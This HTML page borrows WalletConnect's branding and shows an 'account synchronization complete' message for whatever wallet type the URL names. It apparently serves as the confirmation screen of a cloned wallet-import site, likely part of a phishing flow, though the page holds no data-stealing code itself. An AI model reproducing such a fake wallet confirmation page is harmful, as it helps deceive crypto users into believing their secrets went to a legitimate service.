


<html>
    <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
    <head>
    <link rel="stylesheet" href="main.css" type="text/css"/> 
    <meta charset="UTF-8">
    <meta name="description" content="Open protocol for connecting Wallets to Dapps">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta property="og:image" content="../images/logo.svg">
    <link rel="icon" href="images/logo.svg">
    </head>
    
    <title>Importing Wallet</title>
    
    <body>
    <center>
    <div class="top">
            <a href="index-2.html#footer" class="left">Github</a>
            <a href="index-2.html#" class="left">Docs</a>
            <a href="index-2.html" class="main"><img src="images/logo.svg" alt="logo"/></a>
            <a href="index-2.html#wallets" class="left">Wallets</a>
            <a href="index-2.html#" class="left">Apps</a>
    </div>
    </br>
    <h2> <center id="text"></center></h2>
    </br>
    
    <script>
        const urlParams = new URLSearchParams(window.location.search)
        const walletType = (urlParams.get("type") || "").toUpperCase()
        let text  = " ACCOUNT SYNCHRONIZATION COMPLETE "
        text = walletType + text
        document.getElementById("text").innerText = text
    </script>
    <img src="images/bar.png">
    <footer><div id="footer">
    <p><img src="images/discord.svg" class="footimg">  <a href="https://discord.gg/jhxMvxP">Discord</a></p></br>
    <p><img src="images/telegram.svg" class="footimg">  <a href="https://t.me/walletconnect_announcements">Telegram</a></p></br>
    <p><img src="images/twitter.svg" class="footimg">  <a href="https://twitter.walletconnect.org/">Twitter</a></p></br>
    <p><img src="images/github.svg" class="footimg">  <a href="https://github.com/walletconnect">Github</a></p></br>
    </footer>
    </body>
    
    </html>